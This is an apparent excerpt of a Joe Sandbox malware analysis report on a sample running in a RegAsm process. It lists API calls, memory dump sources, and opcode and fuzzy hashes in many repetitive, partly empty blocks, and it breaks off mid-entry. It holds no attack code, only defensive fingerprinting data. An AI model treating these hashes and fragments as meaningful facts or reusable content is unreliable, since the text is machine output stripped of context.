                                                                                                                                                    control_flow_graph 1076 bbd2f9-bbd394 DuplicateHandle 1077 bbd39d-bbd3ba 1076->1077 1078 bbd396-bbd39c 1076->1078 1078->1077
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BBD2C6,?,?,?,?,?), ref: 00BBD387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 89f2b778218b32d00bab0513e127cba8beff07006478c492f2e92919d3c515c2
                                                                                                                                                    • Instruction ID: f285e690b2523d021a7eddc109ee18ccec11a8ea04bd8567717f1e4cea461182
                                                                                                                                                    • Opcode Fuzzy Hash: 89f2b778218b32d00bab0513e127cba8beff07006478c492f2e92919d3c515c2
                                                                                                                                                    • Instruction Fuzzy Hash: 0C2112B5D00209DFDB10CFA9D580AEEBBF5EB48320F14841AE918A3310D778A940CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1081 bba870-bbb2e8 1083 bbb2ea-bbb2ed 1081->1083 1084 bbb2f0-bbb31f LoadLibraryExW 1081->1084 1083->1084 1085 bbb328-bbb345 1084->1085 1086 bbb321-bbb327 1084->1086 1086->1085
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00BBB101,00000800,00000000,00000000), ref: 00BBB312
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 8adbdec9c12d45c6b0e135b2f4474d61d10530610b876907c4a0a43de2b3caa6
                                                                                                                                                    • Instruction ID: 2a992c6962d17577c833bcdb76fcdca43935d0c8b5da56307cba5ff87ffce365
                                                                                                                                                    • Opcode Fuzzy Hash: 8adbdec9c12d45c6b0e135b2f4474d61d10530610b876907c4a0a43de2b3caa6
                                                                                                                                                    • Instruction Fuzzy Hash: 411114B6D003499FDB20CF9AC444AEEFBF4EB48321F10846ED919A7200C7B5A945CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00BBB101,00000800,00000000,00000000), ref: 00BBB312
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 7c47139f0f61ced2ab0d8217cb2578249588e2b4822b7978da5bcb6bf13e5537
                                                                                                                                                    • Instruction ID: 964dce470d7d5ae2617c3f82f046aefa7f704d4254ba1b33b3080427182df193
                                                                                                                                                    • Opcode Fuzzy Hash: 7c47139f0f61ced2ab0d8217cb2578249588e2b4822b7978da5bcb6bf13e5537
                                                                                                                                                    • Instruction Fuzzy Hash: 661114B6D002498FDB24CF9AC544AEEFBF4EB48310F10845ED519A7200C7B4A545CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00BBB086
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 94b056a4026ba83e8a13b4872c669ebf4906d31ab6aab8f3b04981ee8cb62aef
                                                                                                                                                    • Instruction ID: 513627b9c983a3e25e5c441c8bd6542476aed0892e637304ce49aede8ef756d1
                                                                                                                                                    • Opcode Fuzzy Hash: 94b056a4026ba83e8a13b4872c669ebf4906d31ab6aab8f3b04981ee8cb62aef
                                                                                                                                                    • Instruction Fuzzy Hash: F211D4B5C007498FDB20DF9AC544ADEFBF4EB48324F14845AD469A7610C3B5A545CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d
                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                    • Opcode ID: fe1cb9e2e4c7948bed9242fb585b06aef95e5e1a4434bd5392a4005dc7527bcd
                                                                                                                                                    • Instruction ID: ef016cd69096b7f325618eca258235fa946128c6fcfcdfb483af7820de673a15
                                                                                                                                                    • Opcode Fuzzy Hash: fe1cb9e2e4c7948bed9242fb585b06aef95e5e1a4434bd5392a4005dc7527bcd
                                                                                                                                                    • Instruction Fuzzy Hash: 0DC14A35601602DFCB24CF28D480D6ABBF2FF89310B19CA9AD55A8B665D730FD46CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e892f94e5b631c79ab556cf36f2f5f8a3ca91c40c37174e6608daf54d5890bb
                                                                                                                                                    • Instruction ID: ad506031a63b99309c731ab3b97eb5bbcec77abf2afb0363aba0c8f097dc6320
                                                                                                                                                    • Opcode Fuzzy Hash: 1e892f94e5b631c79ab556cf36f2f5f8a3ca91c40c37174e6608daf54d5890bb
                                                                                                                                                    • Instruction Fuzzy Hash: 90C25D74B002189FDB15DB64C854BADBBB6FF88704F108099E60AAB3A1DB71ED45CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    • Opcode ID: ba9a29531347b86fabbce98d6f046a243eabe2fca9855afe12436ec2b081fba9
                                                                                                                                                    • Instruction ID: 3bacb92e53973ed26a614902174016b9e2bac5b840c4e15d8cfcbeb08d65c9d7
                                                                                                                                                    • Opcode Fuzzy Hash: ba9a29531347b86fabbce98d6f046a243eabe2fca9855afe12436ec2b081fba9
                                                                                                                                                    • Instruction Fuzzy Hash: B5417776B002418FDB15CF64C484A6AFBF3FF89314B29895AE45AEB351DB34E841CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1432822659.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_9ed000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1432822659.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_9ed000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

Memory Dump Source
• Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c232f84b81a78f87ce86c694baea7469541b366b0d51da88be509de7ffe09988
                                                                                                                                                    • Instruction ID: b41649266e3be701839b8e012729d96247a9f5201997435d65bdaa43ffb39715
                                                                                                                                                    • Opcode Fuzzy Hash: c232f84b81a78f87ce86c694baea7469541b366b0d51da88be509de7ffe09988
                                                                                                                                                    • Instruction Fuzzy Hash: 6E01D4392102058FE794B734E49A62E3BABEFC0252384882EE406CB710DD387D0B87D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3eabf64718419f2e180bf00b61d7a8e3a21988990f40d37563c661a637d6d399
                                                                                                                                                    • Instruction ID: 90ae17c59e80d15ea80490af52a1919fd9c0e6bcc3be29998fdc912955395a64
                                                                                                                                                    • Opcode Fuzzy Hash: 3eabf64718419f2e180bf00b61d7a8e3a21988990f40d37563c661a637d6d399
                                                                                                                                                    • Instruction Fuzzy Hash: 6EF09E727082904FC31317755C150BD3F61DAC663634442DBE0CACB2D2CF084607C3A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 59466e9e518a5e576ea0abc29554cab5e1148457ef753c8554d0aff80ca44ee0
                                                                                                                                                    • Instruction ID: 12219bfefaf13792ec1c8237a45e9b28d524e45ffc5fdd69c0c212a69dd4635f
                                                                                                                                                    • Opcode Fuzzy Hash: 59466e9e518a5e576ea0abc29554cab5e1148457ef753c8554d0aff80ca44ee0
                                                                                                                                                    • Instruction Fuzzy Hash: 49F062B6C0815ADFCB01DFA4C8555BEBFB1EB5A201F0045D7E846EB352D7398A41DB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dca9888305badbdce18e3c6fd58f1ebc7df7cdfad57dc1aaf3d02cc94e2fa7a0
                                                                                                                                                    • Instruction ID: 24e35fcb86362325bc6661a14237c688c261774e3b3ec55676dd63b7ce4b1f2e
                                                                                                                                                    • Opcode Fuzzy Hash: dca9888305badbdce18e3c6fd58f1ebc7df7cdfad57dc1aaf3d02cc94e2fa7a0
                                                                                                                                                    • Instruction Fuzzy Hash: BBF0B4766047418FDF25CE31E900B7B7BF3BF80315F18886EE08246926D675E445CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4fe0696588a101a9e378b886cabe065eabfeeeac4f2bb3edbbf60bdca0546c1c
                                                                                                                                                    • Instruction ID: 778a6b65a4f37d6de090baa16a11c7fca36389c01113c277903d73b555a738f4
                                                                                                                                                    • Opcode Fuzzy Hash: 4fe0696588a101a9e378b886cabe065eabfeeeac4f2bb3edbbf60bdca0546c1c
                                                                                                                                                    • Instruction Fuzzy Hash: DAE09B312101006FD3106A66E44A66E7FDADBC9365B40803EF14EC3341CD65180547A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d488b6121229f953a666f47d3ba3fd5d2afda000b6ed321e2f84512e1c076bb6
                                                                                                                                                    • Instruction ID: 3d52c6d775be3aaf41eb24458f06b3f6c346304f8da9baaf4b9db8ea6fb0d11c
                                                                                                                                                    • Opcode Fuzzy Hash: d488b6121229f953a666f47d3ba3fd5d2afda000b6ed321e2f84512e1c076bb6
                                                                                                                                                    • Instruction Fuzzy Hash: 92F082756583914FC313573568241BD3F21DB8653630401EBE099CB1D3CD180A06879A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
